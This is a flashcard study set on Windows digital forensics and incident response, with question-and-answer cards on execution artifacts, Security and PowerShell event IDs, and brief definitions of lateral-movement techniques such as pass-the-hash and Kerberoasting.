Section 2: Evidence of Execution, Logs, & Lateral Movement

0.0(0)
Studied by 0 people
call kaiCall Kai
learnLearn
examPractice Test
spaced repetitionSpaced Repetition
heart puzzleMatch
flashcardsFlashcards
GameKnowt Play
Card Sorting

1/17

encourage image

There's no tags or description

Looks like no tags are added yet.

Last updated 8:49 PM on 6/16/26
Name
Mastery
Learn
Test
Matching
Spaced
Call with Kai

No analytics yet

Send a link to your students to track their progress

18 Terms

1
New cards

What is the goal of evidence-of-execution analysis?

To prove what program ran, when it ran, and how it was executed by correlating multiple artifacts.

2
New cards

What information does Prefetch provide?

Strong evidence of program execution, including the executable name, run count, and the last 8 execution times.

3
New cards

What does Amcache.hve reliably store for an executable?

The SHA-1 hash of the executed program, its full path, and its first execution time.

4
New cards

What does ShimCache (AppCompatCache) prove?

It proves a file was present on the system and checked for compatibility, but does NOT prove it actually executed.

5
New cards

What value is used to track all activities within a single, unique user logon session?

The Logon ID (e.g., 0x2F8A1).

6
New cards

What does Event ID 4624 followed immediately by 4672 signify?

A successful logon (4624) where the account was granted administrative-level privileges (4672).

7
New cards

What does Event ID 7045 indicate?

A new service was installed, which is a key indicator for lateral movement tools like PsExec.

8
New cards

What does Event ID 4648 show?

A logon attempt using explicit credentials, such as with the 'runas' command or a "Run as administrator" prompt.

9
New cards

What does Event ID 1102 indicate?

The Security log was cleared (a strong indicator of defense evasion).

10
New cards

What does Event ID 4104 (PowerShell Script Block Logging) capture?

The actual content of PowerShell scripts as they are executed, automatically de-obfuscating them in many cases.

11
New cards

What does a "Warning" level on a 4104 PowerShell event signify?

PowerShell automatically identified the script block as potentially malicious based on its characteristics.

12
New cards

What is the key feature of PowerShell transcript logs?

They capture both the commands an attacker types AND the full text output of those commands.

13
New cards

What is the parent process for a PowerShell Remoting session?

WSMProvHost.exe.

14
New cards

What service must be enabled to modify the registry of a remote computer for lateral movement?

The Remote Registry service.

15
New cards

What Logon Type number is generated by a PowerShell Remoting session?

Logon Type 3 (Network).

16
New cards

What is pass-the-hash?

An attack using a stolen NTLM hash to authenticate without needing the plaintext password.

17
New cards

What is Kerberoasting?

Requesting service tickets for accounts with a Service Principal Name (SPN) and cracking them offline to recover passwords.

18
New cards